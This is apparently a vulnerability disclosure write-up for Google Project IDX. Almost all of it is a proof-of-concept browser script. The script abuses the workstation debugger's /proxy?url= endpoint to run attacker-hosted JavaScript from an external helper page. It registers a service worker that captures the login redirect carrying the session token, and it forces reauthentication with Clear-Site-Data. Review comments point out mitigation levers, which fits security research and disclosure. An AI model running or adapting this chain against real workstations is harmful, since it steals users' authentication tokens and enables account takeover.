Writeups

Project IDX is a hosted development environment based on Visual Studio Code, similar to Google Cloud Shell.

Feature being abused: https://developers.google.com/idx/guides/debug-in-idx#chrome-devtools
It is based on the Chii open source project: https://github.com/liriliri/chii/commit/0002b761737f450fe070699b6fec284d6e1e91e9

// Vulnerable debugger proxy (Runs any js code you want, Fetch as the victims server)
// Proof-of-concept chain from the writeup, written as a flat browser script.
// Every step is a navigation through the workstation's `/proxy?url=` endpoint,
// so remote content is delivered under the workstation origin. From the
// defender's side the control points visible here are: (1) the proxy accepting
// an arbitrary remote URL, (2) a service worker being registrable from a
// proxied script, and (3) the login redirect carrying the token in a URL that
// a fetch handler can observe (see the worker source below).
let target = 'https://8282-monospace-<ID>.cloudworkstations.dev/proxy?url=';

// Link to our service worker
// `xss.php` is an external helper page driven by its query parameters; `ct`
// presumably selects the response Content-Type so the proxied body is accepted
// as a worker script — inferred from the parameter name, not shown here.
let proxy = new URL('https://terjanq.me/xss.php');
proxy.searchParams.set('ct', 'application/javascript');
// Worker source. It is string content, not code at this level, so it is kept
// verbatim. The worker only logs request URLs containing "_workstation/login";
// it does not modify any response. Detection angle: a `serviceWorker.register`
// whose script URL is the `/proxy?url=` endpoint is the observable artefact.
proxyPayload = `
self.addEventListener("fetch", (event) => {
 let url = event.request.url;
 // Leak token from redirect since its a httponly cookie
  // Authentication is done by:
 // Redirecting the user to https://ssh.cloud.google.com/devshell/gateway/oauth?state=<value> (Cross-site, COOP, embed protection)
 // https://<PORT>-idx-<ID>.cloudworkstations.dev/_workstation/login?redirect=<value> this sets a cookie then redirects back.
 if (url.includes("_workstation/login")) {
  console.info('🎉 Leaked token: '+url);
 }
});
`;
proxy.searchParams.set('html', proxyPayload);

// Link to force a re-authenticate
// The `h[...]` parameter presumably makes the helper emit a response header,
// here `Clear-Site-Data: "cookies"`. Served through the proxy, that would drop
// the workstation session cookie so the next navigation re-runs the login
// redirect described in the worker's comments — which the registered worker
// is waiting to see. NOTE(review): whether the proxy forwards this header is
// not shown here; confirm against the proxy implementation.
let reauth = new URL('https://terjanq.me/xss.php');
reauth.searchParams.set('h[Clear-Site-Data]', '"cookies"');
// After a delay, navigate to the origin root to trigger the redirect flow.
reauthPayload = `
setTimeout(() => { location.href=location.origin }, 3000);
`;
reauth.searchParams.set('js', reauthPayload);

// Link to create service worker
// Both nested URLs are wrapped through `target`, so the worker script and the
// follow-up navigation are same-origin with the workstation. The 3 s delay
// presumably gives registration time to complete before leaving the page.
// Mitigation lever (review): the proxy should not return arbitrary remote
// bodies as script under the workstation origin, and the login redirect
// should not carry the token in a URL visible to fetch handlers.
let setup = new URL('https://terjanq.me/xss.php');
setupPayload = `
navigator.serviceWorker.register("${target + encodeURIComponent(proxy.href)}");
setTimeout(() => { location.href="${target + encodeURIComponent(reauth.href)}" }, 3000);
`;
setup.searchParams.set('js', setupPayload);

// Do the stuff
// Entry point: assigning to `location` navigates the current tab to the first
// stage. NOTE(review): `proxyPayload`, `reauthPayload` and `setupPayload` are
// assigned without a declaration (implicit globals); left as-is because the
// strings are only read back within this script.
location = target + encodeURIComponent(setup.href);